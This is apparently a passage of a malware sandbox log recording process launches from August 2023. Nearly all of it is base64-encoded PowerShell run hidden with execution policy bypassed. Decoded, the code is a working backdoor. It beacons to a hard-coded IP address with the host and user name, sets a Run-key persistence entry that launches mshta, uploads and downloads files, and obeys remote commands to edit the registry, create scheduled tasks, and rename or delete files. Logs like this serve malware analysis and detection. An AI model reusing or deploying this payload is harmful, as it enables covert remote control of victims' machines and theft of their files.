QAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAA9ACAAJwBfAGYAaQBsAGUAJwA7ACQAbgBvAHcAdABpAG0AZQAgAD0AIABHAGUAdAAtAEQAYQB0AGUAIAAtAEYAbwByAG0AYQB0ACAAeQB5AHkAeQAtAE0ATQAtAGQAZABfAEgASABfAG0AbQBfAHMAcwA7ACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAG4AbwB3AHQAaQBtAGUAIAArACAAJwBfAGYAaQBsAGUAJwA7AEIAYQBpAFUASABVAFEAYgB6AFEASgBBAHMAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAUQBCAGkAYQAgACQAYQB0AHQAYQBjAGgAbQBlAG4AdABfAG4AYQBtAGUAIAAkAGEAdAB0AGEAYwBoAG0AZQBuAHQAXwBmAGkAbABlAG4AYQBtAGUAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGQAbwB3AG4AOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AHcAWQBsAGIAZABoAFUARgBEAGwAcgAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBnAGUAZABpAHQAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgAOAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBOAGEAbQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQAgAC0AVgBhAGwAdQBlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHQAYQBzAGsAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANQApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADUAKQB7ACQAQQBjAHQAaQBvAG4AIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJABDAGgAYQByAEEAcgByAGEAeQBbADQAXQA7ACQAUwBlAHQAdABpAG4AZwBzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAOwAkAHQAcgBpAGcAZwBlAHIAIAA9ACAATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAE8AbgBjAGUAIAAtAEEAdAAgACgARwBlAHQALQBEAGEAdABlACkAIAAtAFIAZQBwAGUAdABpAHQAaQBvAG4ASQBuAHQAZQByAHYAYQBsACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAE0AaQBuAHUAdABlAHMAIAAxADAAKQA7ACQAVABhAHMAawAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABBAGMAdABpAG8AbgAgAC0AVAByAGkAZwBnAGUAcgAgACQAVAByAGkAZwBnAGUAcgAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABTAGUAdAB0AGkAbgBnAHMAOwBSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdACAALQBUAGEAcwBrAFAAYQB0AGgAIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAALQBJAG4AcAB1AHQATwBiAGoAZQBjAHQAIAAkAFQAYQBzAGsAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAEMAbwBuAHQAYQBpAG4AcwAoACcAegBpAHAAOgAnACkAKQB7ACQAUQBCAGkAYQA9ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAuAFMAdQBiAFMAdAByAGkAbgBnACgANAApADsAJABDAGgAYQByAEEAcgByAGEAeQAgAD0AJABRAEIAaQBhAC4AUwBwAGwAaQB0ACgAJwB8AHwAJwApADsAaQBmACAAKAAkAEMAaABhAHIAQQByAHIAYQB5AC4ATABlAG4AZwB0AGgAIAAtAGUAcQAgADMAKQB7AEUAeABwAGEAbgBkAC0AQQByAGMAaABpAHYAZQAgACQAQwBoAGEAcgBBAHIAcgBhAHkAWwAwAF0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMgBdADsAJABYAFQAbABsACAAPQAgACcAUgA9ACcAIAArACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACcAbwBrACcAKQApADsAVQBsAFUAbQBMACAAJABaAFoAUwBaAGQAYgB1AE4AUgBPAHUAIAAkAFgAVABsAGwAOwB9AH0AaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAHIAZQBuAGEAbQBlADoAJwApACkAewAkAFEAQgBpAGEAPQAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBTAHUAYgBTAHQAcgBpAG4AZwAoADcAKQA7ACQAQwBoAGEAcgBBAHIAcgBhAHkAIAA9ACQAUQBCAGkAYQAuAFMAcABsAGkAdAAoACcAfAB8ACcAKQA7AGkAZgAgACgAJABDAGgAYQByAEEAcgByAGEAeQAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAzACkAewBSAGUAbgBhAG0AZQAtAEkAdABlAG0AIAAkAEMAaABhAHIAQQByAHIAYQB5AFsAMABdACAAJABDAGgAYQByAEEAcgByAGEAeQBbADIAXQA7ACQAWABUAGwAbAAgAD0AIAAnAFIAPQAnACAAKwAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnAG8AawAnACkAKQA7AFUAbABVAG0ATAAgACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAJABYAFQAbABsADsAfQB9AGkAZgAgACgAJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AQwBvAG4AdABhAGkAbgBzACgAJwBkAGUAbAA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA0ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewBSAGUAbQBvAHYAZQAtAEkAdABlAG0AIAAkAFEAQgBpAGEAOwAkAFgAVABsAGwAIAA9ACAAJwBSAD0AJwAgACsAIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBvAGsAJwApACkAOwBVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACQAWABUAGwAbAA7AH0AfQB9AH0AfQAgAEMAYQB0AGMAaAB7AH0AUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQA7AH0AdwBoAGkAbABlACgAJAB0AHIAdQBlACAALQBlAHEAIAAkAHQAcgB1AGUAKQA= filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000002b4	1	1	0
ShellExecuteExW Aug. 16, 2023, 2:57 p.m.	show_type: 0 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe parameters: -windowstyle hidden -ep bypass -ec UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAOAA1ADsAJABPAGsAUwBEAEwAbABXAGMAVgBmAG4AcQBvAG8AIAA9ACAAMQAwADIANAAgACoAIAAxADAAMgA0ADsAJABvAHUAawBjAHYAVQBGAFAAaAAgAD0AIAAkAGUAbgB2ADoAQwBPAE0AUABVAFQARQBSAE4AQQBNAEUAIAArACAAJwAtACcAIAArACAAJABlAG4AdgA6AFUAUwBFAFIATgBBAE0ARQA7ACQAWgBaAFMAWgBkAGIAdQBOAFIATwB1ACAAPQAgACcAaAB0AHQAcAA6AC8ALwA3ADUALgAxADEAOQAuADEAMwA2AC4AMgAwADcALwBjAG8AbgBmAGkAZwAvAGIAYQBzAGUAcwAvAGMAbwBuAGYAaQBnAC4AcABoAHAAJwAgACsAIAAnAD8AVQA9ACcAIAArACAAJABvAHUAawBjAHYAVQBGAFAAaAA7ACQAeQB5AFUAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcAGcAWQBOAEMAcQBDAFEAJwA7AGkAZgAgACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB5AHkAVQApACkAIAB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAgAC0ATgBhAG0AZQAgAG0ATwBUAEMASwBkACAALQBWAGEAbAB1AGUAIAAnAGMAOgBcAHcAaQBuAGQAbwB3AHMAXABzAHkAcwB0AGUAbQAzADIAXABjAG0AZAAuAGUAeABlACAALwBjACAAUABvAHcAZQByAFMAaABlAGwAbAAuAGUAeABlACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0ATgBvAEwAbwBnAG8AIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0AZQBwACAAYgB5AHAAYQBzAHMAIABwAGkAbgBnACAALQBuACAAMQAgAC0AdwAgADUANgAzADkANAAyACAAMgAuADIALgAyAC4AMgAgAHwAfAAgAG0AcwBoAHQAYQAgAGgAdAB0AHAAOgAvAC8ANwA1AC4AMQAxADkALgAxADMANgAuADIAMAA3AC8AYwBvAG4AZgBpAGcALwBiAGEAcwBlAHMALwAxAC4AaAB0AG0AbAAnACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUAOwB9AGYAdQBuAGMAdABpAG8AbgAgAFUAbABVAG0ATAAoACQAQwBzAEQAdAAsACAAJABXAFoAaABsAHYAbQBJAGQAbgApAHsAJABDAGYAcwBXAEkARQBuAE8ASQByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAkAFcAWgBoAGwAdgBtAEkAZABuACkAOwBbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBIAHQAdABwAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQAgACQAbgBGAFoAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACQAQwBzAEQAdAApADsAJABuAEYAWgAuAE0AZQB0AGgAbwBkACAAPQAgACcAUABPAFMAVAAnADsAJABuAEYAWgAuAEMAbwBuAHQAZQBuAHQAVAB5AHAAZQAgAD0AIAAnAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAHgALQB3AHcAdwAtAGYAbwByAG0ALQB1AHIAbABlAG4AYwBvAGQAZQBkACcAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABMAGUAbgBnAHQAaAAgAD0AIAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALgBMAGUAbgBnAHQAaAA7ACQAeQB5AFUAVQAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHEAdQBlAHMAdABTAHQAcgBlAGEAbQAoACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAEMAZgBzAFcASQBFAG4ATwBJAHIALAAgADAALAAgACQAQwBmAHMAVwBJAEUAbgBPAEkAcgAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AHIAZQB0AHUAcgBuACAAJAB5AHkAVQBVAEwAVAA7AH0AZgB1AG4AYwB0AGkAbwBuACAAQgBhAGkAVQBIAFUAUQBiAHoAUQBKAEEAcwAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcALAAgACQAeABkAEgASwBEAHYARgBNACwAIAAkAEMATgBHAG4AdwBXACkAewAkAFQAaQBtAGUAbwB1AHQAPQAxADAAMAAwADAAMAAwADAAOwAkAEMAUgBMAEYAIAA9ACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABEACkAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMABBACkAOwAkAFQAdwBvAEgAeQBwAGgAZQBuAHMAIAA9ACAAJwAtAC0AJwA7ACQAQgBvAHUAbgBkAGEAcgB5ACAAPQAgACcAKgAqACoAKgAqACcAOwAkAHMAdAByAGUAYQBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AE8AcABlAG4AUgBlAGEAZAAoACQAZgByAFIAWQBtAHcAYgB3ACkAOwAkAGcAQgBGAHYAUABnAGIAWgAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAYgB5AHQAZQBbAF0AIAAkAE8AawBTAEQATABsAFcAYwBWAGYAbgBxAG8AbwA7AHcAaABpAGwAZQAoACAAJABiAHkAdABlAHMAUgBlAGEAZAAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAZwBCAEYAdgBQAGcAYgBaACwAMAAsACQATwBrAFMARABMAGwAVwBjAFYAZgBuAHEAbwBvACkAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABuAEYAWgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBSAGUAcQB1AGUAcwB0AF0AOgA6AEMAcgBlAGEAdABlACgAJABDAHMARAB0ACkAOwAkAG4ARgBaAC4ATQBlAHQAaABvAGQAIAA9ACAAJwBQAE8AUwBUACcAOwAkAG4ARgBaAC4AVABpAG0AZQBvAHUAdAAgAD0AIAAkAFQAaQBtAGUAbwB1AHQAOwAkAG4ARgBaAC4AQwBvAG4AdABlAG4AdABUAHkAcABlACAAPQAgACcAbQB1AGwAdABpAHAAYQByAHQALwBmAG8AcgBtAC0AZABhAHQAYQA7AGIAbwB1AG4AZABhAHIAeQA9ACcAIAArACAAJABCAG8AdQBuAGQAYQByAHkAOwAkAHkAeQBVAFUAIAA9ACAAJABuAEYAWgAuAEcAZQB0AFIAZQBxAHUAZQBzAHQAUwB0AHIAZQBhAG0AKAApADsAJABoAGUAYQBkAGkAbgBnADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEIAbwB1AG4AZABhAHIAeQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAxACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMQAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJwBDAG8AbgB0AGUAbgB0AC0ARABpAHMAcABvAHMAaQB0AGkAbwBuADoAIABmAG8AcgBtAC0AZABhAHQAYQA7ACAAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJAB4AGQASABLAEQAdgBGAE0AIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJwA7AGYAaQBsAGUAbgBhAG0AZQA9ACcAIAArACAAWwBzAHQAcgBpAG4AZwBdACQAKABbAGMAaABhAHIAXQAwAHgAMgAyACkAIAArACAAJABDAE4ARwBuAHcAVwAgACsAIABbAHMAdAByAGkAbgBnAF0AJAAoAFsAYwBoAGEAcgBdADAAeAAyADIAKQAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAyACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMgAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcAMwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABDAFIATABGACkAOwAkAHkAeQBVAFUALgBXAHIAaQB0AGUAKAAkAGgAZQBhAGQAaQBuAGcAMwAsACAAMAAsACAAJABoAGUAYQBkAGkAbgBnADMALgBMAGUAbgBnAHQAaAApADsAJAB5AHkAVQBVAC4AVwByAGkAdABlACgAJABnAEIARgB2AFAAZwBiAFoALAAgADAALAAgACQAYgB5AHQAZQBzAFIAZQBhAGQAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwAzACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcAMwAuAEwAZQBuAGcAdABoACkAOwAkAGgAZQBhAGQAaQBuAGcANAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAQgB5AHQAZQBzACgAJABUAHcAbwBIAHkAcABoAGUAbgBzACAAKwAgACQAQgBvAHUAbgBkAGEAcgB5ACAAKwAgACQAVAB3AG8ASAB5AHAAaABlAG4AcwAgACsAIAAkAEMAUgBMAEYAKQA7ACQAeQB5AFUAVQAuAFcAcgBpAHQAZQAoACQAaABlAGEAZABpAG4AZwA0ACwAIAAwACwAIAAkAGgAZQBhAGQAaQBuAGcANAAuAEwAZQBuAGcAdABoACkAOwAkAHkAeQBVAFUALgBGAGwAdQBzAGgAKAApADsAJAB5AHkAVQBVAC4AQwBsAG8AcwBlACgAKQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHMAcABvAG4AcwBlAF0AIAAkAEkATgBmAHEAZwAgAD0AIAAkAG4ARgBaAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUwBnAHUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKAAkAEkATgBmAHEAZwAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkAKQA7ACQAeQB5AFUAVQBMAFQAIAA9ACAAJABTAGcAdQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0AJABzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwB9AGYAdQBuAGMAdABpAG8AbgAgAHcAWQBsAGIAZABoAFUARgBEAGwAcgAoACQAQwBzAEQAdAAsACAAJABmAHIAUgBZAG0AdwBiAHcAKQB7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAEgAdAB0AHAAVwBlAGIAUgBlAHEAdQBlAHMAdABdACAAJABSAGUAcQB1AGUAcwB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoAQwByAGUAYQB0AGUAKAAkAEMAcwBEAHQAKQA7ACQAUgBlAHEAdQBlAHMAdAAuAHMAZQB0AF8AVABpAG0AZQBvAHUAdAAoADEANQAwADAAMAApADsAJABSAGUAcwBwAG8AbgBzAGUAIAA9ACAAJABSAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQA7ACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtACgAKQA7ACQAUwBwAGwAaQB0AFMAaQB6AGUAIAA9ACAAMQAwADIANAA7ACQAQgB1AGYAZgBlAHIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAQgB5AHQAZQBbAF0AIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABTAHAAbABpAHQAUwBpAHoAZQA7AFQAcgB5ACAAewBEAG8AIAB7ACQAQwBvAHUAbgB0ACAAPQAgACQAUgBlAHMAcABvAG4AcwBlAFMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAQgB1AGYAZgBlAHIALAAgADAALAAgACQAUwBwAGwAaQB0AFMAaQB6AGUAKQA7ACQAbwBmAGYAcwBlAHQAIAA9ACAAJABDAG8AdQBuAHQAIAAtACAAMQA7AEEAZABkAC0AQwBvAG4AdABlAG4AdAAgACQAZgByAFIAWQBtAHcAYgB3ACAAJABCAHUAZgBmAGUAcgBbADAALgAuACQAbwBmAGYAcwBlAHQAXQAgAC0ARQBuAGMAbwBkAGkAbgBnACAAQgB5AHQAZQA7AH0AIABVAG4AdABpAGwAKAAkAEMAbwB1AG4AdAAgAC0AZQBxACAAMAApAH0AIABDAGEAdABjAGgAIAB7AH0AIABGAGkAbgBhAGwAbAB5ACAAewAkAFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAuAEQAaQBzAHAAbwBzAGUAKAApADsAfQB9AGQAbwB7AFQAcgB5AHsAJABKAE4AZgAgAD0AIABVAGwAVQBtAEwAIAAkAFoAWgBTAFoAZABiAHUATgBSAE8AdQAgACcAJwA7AEkAZgAgACgAJABKAE4AZgAgAC0AbgBlACAAJwBuAHUAbABsACcAIAAtAGEAbgBkACAAJABKAE4AZgAgAC0AbgBlACAAJwAnACkAewAkAEoATgBmAD0AJABKAE4AZgAuAFMAdQBiAFMAdAByAGkAbgBnACgAMQAsACAAJABKAE4AZgAuAEwAZQBuAGcAdABoACAALQAgADIAKQA7ACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABKAE4AZgApACkAOwBpAGYAIAAoACQARQB1AHgAZgBQAHIAdgB2AHoARgB1AFYAQgApAHsAaQBmACAAKAAkAEUAdQB4AGYAUAByAHYAdgB6AEYAdQBWAEIALgBDAG8AbgB0AGEAaQBuAHMAKAAnAGYAaQBsAGUAaQBuAGYAbwA6ACcAKQApAHsAJABRAEIAaQBhAD0AJABFAHUAeABmAFAAcgB2AHYAegBGAHUAVgBCAC4AUwB1AGIAUwB0AHIAaQBuAGcAKAA5ACkAOwBpAGYAIAAoAFQAZQBzAHQALQBQAGEAdABoACAALQBQAGEAdABoACAAJABRAEIAaQBhACkAewAkAGYAaQBsAGUAbgBhAG0AZQAgAD0AIAAkAHkAeQBVACAAKwAgACcALgBjAHMAdgAnADsARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAUQBCAGkAYQAgAC0ARgBpAGwAdABlAHIAIAAqAC4AKgAgAC0AUgBlAGMAdQByAHMAZQAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACA